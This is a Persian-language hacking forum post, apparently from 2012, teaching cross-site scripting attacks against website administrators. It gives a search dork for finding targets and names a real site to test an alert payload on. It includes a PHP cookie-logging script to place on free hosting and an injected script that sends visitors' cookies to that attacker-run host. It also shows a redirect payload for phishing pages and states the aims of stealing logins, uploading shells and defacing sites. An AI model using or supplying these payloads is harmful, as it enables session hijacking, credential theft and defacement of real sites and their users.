• ¡Welcome to Square Theme!
  • This news are in header template.
  • Please ignore this message.
مهمان عزیز خوش‌آمدید. ورود عضــویت


امتیاز موضوع:
  • 1 رای - 5 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
Title: اموزش XSS و کدهای ان
حالت خطی
#2
خوب توضیحاتی دادیم در مورد این باگ بدم من به روش اسان همیشه مطالبم رو اموزش میدهم .
خوب باید باید بگیریم اول بفهمیم سایت باگ xss داره یا نداره !
یادتون باشه یاید مدیر سایت انلاین باشه مثلا توی نظرات یک وب سایت باگ xss داره وقتی کدمون رو تزریق میکنیم باید مدیر سایت صفحه رو باز کنه وقتی که باز کنه اون موقع کد ما اجرا میشه و میتونیم دستورات رو اجرا کنیم .
یادتون باشه وقتی مرورگر مدیر سایت صفحه ای که کدهای xss رو تزریق کردیم رو باز میکنه کدهای ما اجرا شده توجه کنید کدهاتون روی سیستم مدیر سایت یا کاربرقربانی اجرا میشه و ربطی به سرور نداره
وقتی کوکی رو بزنیم میتونیم یوزر و پسوورد طرف رو بزنیم و حتی شل اپلود کنیم و کلا دیفیس کنیم.
برای پیدا کردن سایت های که باگ xss دارن نیاز به درک یا اسکنر یا به صورت دستی تست کردن داریم .
من فعلا یک درک میزارم بعد درک های بیشتری قرار میدهیم.
درک xss
کد:
"search?q=" or "search.php?q=
راه بعدی استفاده از اسکنر Acunetix Web Vulnerability Scanner سایت رو بدید اسکن کنه در صورت پیدا کردن پیغام Cross Site Scripting رو دیدید بدونید که باگ xss داره و نقطه ضعف داره !

حالا یه تست xss میکنیم سایت زیر رو باز کنید .
http://www.lifepages.org/comm/search1.asp

در قسمت سرچ برای کشف اسیب پذیری xss در قسمت سرچ عبارت زیر رو تایپ کنید :

کد:
<script>alert("xss bug find by parsicoders")</script>
اگر در قسمت سرچ باگ xss باشه پیغام xss bug find b parsicoders رو میبینید.
روی تصویر زیر کلیک کنید تا بهتر متوجه بشید :

[عکس: tzpz6jra8rg0m3n5nq_thumb.jpg]


توجه کنید باید xss در کامنت یا جایی باشه که مدی سایت ببینه بعد از پیدا کردن تارگت میخواهیم کوکیش رو بزنیم چطوری کوکی رو بزنیم ؟

اول برید توی سایت x10hosting.com یه هاست فری برای خودتون درست کنید.

کد زیر رو داخل notepad وارد کنید و به اسم iran.php ذخیره کنید.

کد :

کد:
<?php
$cookie = $_GET['cookie'];
$log = fopen("parsicoders.txt", "a");
fwrite($log, $cookie ."\n");
fclose($log);
?>


بعد از ذخیره داخل هاست که اکانت ساختید اپلود کنید یا در هاست رایگان gigfa.com هم میشه
تازه وارد ها (فایل باید داخل پوشه Public_Html ) باشه

حالا کد زیر رو تزریق میکنیم

کد:
<script>document.location="http://www.siteshoma.com/iran.php?cookie=" + document.cookie;</script>

حالا جای siteshoma.com ادرس سایت خودتون رو بدید اگر به فرض در قسمت نظرات همچین باگی باشه هر کاربری کلیک کرد نظرات رو ببینه از ادمین تا کاربرها همه کوکیهاشون در هاستتون کنار فایلی که اپلود کردید یه فایل به اسم parsicoders.log ایجاد میشه

اگر بخواهیم مدیر سایت یا کاربرانش رو به سایت دیگری هدایت کنیم به روش زیر عمل میکنیم (بدرد fake page ) هم میخوره
به کد زیر توجه کنید :

Redirect to www.parsicoders.com
کد:
<script>window.location="http://parsicoders.com/index.php";</script>
.... ادامه دارد
گروه دور همی پارسی کدرز
https://t.me/joinchat/GxVRww3ykLynHFsdCvb7eg
 
پاسخ
  


پیام‌های این موضوع
اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 07:15 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 08:14 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-22-2012، 11:24 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 11:30 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-22-2012، 11:40 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-22-2012، 11:46 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:01 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:14 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:21 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:35 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:40 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:47 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 12:50 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:58 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 03:20 AM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 11:07 AM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 12:46 PM
RE: اموزش XSS و کدهای ان - توسط parvin - 01-23-2012، 03:29 PM
RE: اموزش XSS و کدهای ان - توسط Amin_Mansouri - 01-23-2012، 03:31 PM
RE: اموزش XSS و کدهای ان - توسط Ghoghnus - 06-08-2012، 12:43 AM
RE: اموزش XSS و کدهای ان - توسط hacker black - 08-10-2012، 03:18 AM

موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  اموزش DDOS Amin_Mansouri 14 34,954 01-06-2017، 02:16 PM
آخرین ارسال: taktok
  اموزش هک مودم ADSL Amin_Mansouri 7 19,247 09-06-2016، 12:36 AM
آخرین ارسال: A.S
  کلیپ اموزش حرفه ای sql injection Amin_Mansouri 0 3,950 06-07-2012، 11:58 PM
آخرین ارسال: Amin_Mansouri
  اموزش حمله Sql injection بصورت انلاین Amin_Mansouri 0 5,889 06-05-2012، 11:28 PM
آخرین ارسال: Amin_Mansouri

پرش به انجمن:


Browsing: 4 مهمان